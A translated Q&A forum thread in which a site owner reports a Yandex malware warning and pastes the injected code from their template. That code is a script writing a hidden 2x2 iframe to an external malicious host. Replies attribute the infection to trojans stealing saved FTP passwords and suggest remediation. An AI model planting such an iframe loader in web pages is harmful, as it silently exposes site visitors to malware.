Answer the question
In order to leave comments, you need to log in
Viruses on the site. How was FTP hacked?
On July 2, I unexpectedly received the following letter from Yandex in my mail:
Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.
<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">
<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->
img/main_bg.gif) repeat-y center #244e9f;">
Answer the question
In order to leave comments, you need to log in
“It's complicated, you can't pick it up”
Uh-huh, only it is transmitted in the form of plain text ) Maybe you should think about SSH / SFTP? I apologize in advance if everything is already secure in this regard, it’s just that you mention “just” FTP there.
A fairly standard situation is when a Trojan steals FTP passwords for websites. That is, there are or were viruses. Look for the Trojan on all computers from which the site was accessed via FTP, perhaps they went somewhere else and forgot about it. Change the password for FTP access. After going, set the permissions on the files so that they cannot be overwritten via FTP, every time you need to update the site, change the permissions back.
I know for sure that this is how passwords from old versions of Filezilla, WS_FTP (I don’t know about the new ones) and Total Commander.
it is enough to visit a site infected according to the same scheme with any browser, and through the adobe flash / sun java vulnerabilities, the virus is activated on the computer and scans the saved passwords in the settings files of popular ftp clients.
the standard situation, as they say above, is the computer from which they visited the site at least once.
Trojans have long been able to collect passwords from “headlights”, “total commander” and other popular programs.
change passwords monitor login attempts, restrict incoming ip on ftp
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question